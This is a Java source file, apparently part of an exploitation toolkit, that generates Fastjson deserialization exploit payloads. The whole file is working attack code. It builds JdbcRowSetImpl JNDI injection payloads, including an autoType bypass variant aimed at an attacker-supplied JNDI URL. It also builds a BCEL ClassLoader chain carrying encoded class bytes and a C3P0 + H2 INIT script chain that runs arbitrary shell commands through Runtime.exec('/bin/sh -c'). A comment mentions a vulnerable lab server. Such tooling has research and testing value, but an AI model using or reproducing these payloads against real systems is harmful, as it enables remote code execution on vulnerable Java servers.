package com.oobx.chains;

import org.springframework.stereotype.Component;

import java.util.Base64;
import java.util.Map;

/**
 * Fastjson deserialization exploit chains.
 *
 * Gadgets:
 * - JdbcRowSetImpl JNDI (Fastjson ≤1.2.47 / 1.2.80 autoType bypass)
 * - BCEL ClassLoader (≤1.2.24) — bytecode generated by CustomBytecodeHandler (Javassist)
 *
 * No ASM / custom gadget code — uses CustomBytecodeHandler for class generation.
 */
@Component
public class FastjsonChainHandler implements ChainHandler {

    private final CustomBytecodeHandler bytecodeHandler;

    public FastjsonChainHandler(CustomBytecodeHandler bytecodeHandler) {
        this.bytecodeHandler = bytecodeHandler;
    }

    @Override
    public PayloadResult generate(String chainId, Map<String, Object> params) throws Exception {
        String jndiUrl = (String) params.getOrDefault("jndi_url", "");
        String cmd     = (String) params.getOrDefault("cmd", "id");

        String json = switch (chainId) {
            case "jchains_fastjson", "fastjson_jdbcrowset"  -> jdbcRowSetJson(jndiUrl);
            case "fastjson_jdbcrowset_v2"                   -> jdbcRowSetV2Json(jndiUrl);
            // BCEL: delegate class generation to CustomBytecodeHandler (Javassist), then BCEL-encode
            // jchains_fastjson_bcel also routed here — java-chains generates non-@type format
            case "fastjson_bcel", "jchains_fastjson_bcel"   -> bcelJson(bcelDriverClassName(cmd, params));
            // C3P0 + H2 JDBC INIT script RCE: Fastjson instantiates ComboPooledDataSource,
            // VulnLabServer calls getConnection() → H2 INIT runs → alias executes cmd
            case "jchains_fastjson_c3p0_h2"                 -> c3p0H2Json(cmd);
            default -> throw new IllegalArgumentException("Unknown Fastjson chain: " + chainId);
        };

        return new PayloadResult("application/json", json.getBytes(),
            Map.of("jndi_url", jndiUrl, "cmd", cmd, "source", "Fastjson/" + chainId));
    }

    // ── Payload builders ─────────────────────────────────────────────────────

    private String jdbcRowSetJson(String jndiUrl) {
        return String.format(
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}", jsonEsc(jndiUrl));
    }

    private String jdbcRowSetV2Json(String jndiUrl) {
        return String.format(
            "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"}," +
            "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\"," +
            "\"dataSourceName\":\"%s\"," +
            "\"autoCommit\":true}]", jsonEsc(jndiUrl));
    }

    /**
     * Generate BCEL driverClassName: $$BCEL$$<base64(classBytes) with + → $ and / → !>
     * Class bytes come from CustomBytecodeHandler (Javassist) — no custom ASM.
     */
    private String bcelDriverClassName(String cmd, Map<String, Object> params) throws Exception {
        // Delegate to CustomBytecodeHandler which uses Javassist
        byte[] classBytes = bytecodeHandler.generate("custom_bytecode", params).bytes();
        // BCEL encoding: standard base64 with char substitutions
        String b64 = Base64.getEncoder().encodeToString(classBytes)
                          .replace("+", "$").replace("/", "!");
        return "$$BCEL$$" + b64;
    }

    private String bcelJson(String driverClassName) {
        return String.format(
            "{\"@type\":\"org.apache.commons.dbcp.BasicDataSource\"," +
            "\"driverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}," +
            "\"driverClassName\":\"%s\"}", jsonEsc(driverClassName));
    }

    /**
     * C3P0 ComboPooledDataSource + H2 JDBC INIT script RCE.
     * Fastjson instantiates ComboPooledDataSource → VulnLabServer calls getConnection()
     * → H2 processes INIT script → CREATE ALIAS + CALL executes cmd.
     * Dollar-quoting ($$...$$) preserves internal semicolons in alias body.
     */
    private String c3p0H2Json(String cmd) {
        String dbId = Long.toHexString(System.nanoTime()).substring(0, 8);
        String aliasBody = "void oobx(String c) throws Exception {"
            + " Runtime.getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",c}); }";
        String jdbcUrl = "jdbc:h2:mem:oobx" + dbId + ";"
            + "TRACE_LEVEL_SYSTEM_OUT=3;"
            + "INIT=CREATE ALIAS IF NOT EXISTS OOBX AS $$" + aliasBody + "$$\\;"
            + "CALL OOBX('" + cmd.replace("'", "\\'") + "')";
        return String.format(
            "{\"@type\":\"com.mchange.v2.c3p0.ComboPooledDataSource\"," +
            "\"driverClass\":\"org.h2.Driver\"," +
            "\"jdbcUrl\":\"%s\"," +
            "\"user\":\"sa\",\"password\":\"\"}",
            jsonEsc(jdbcUrl));
    }

    private static String jsonEsc(String s) {
        return s.replace("\\", "\\\\").replace("\"", "\\\"");
    }
}
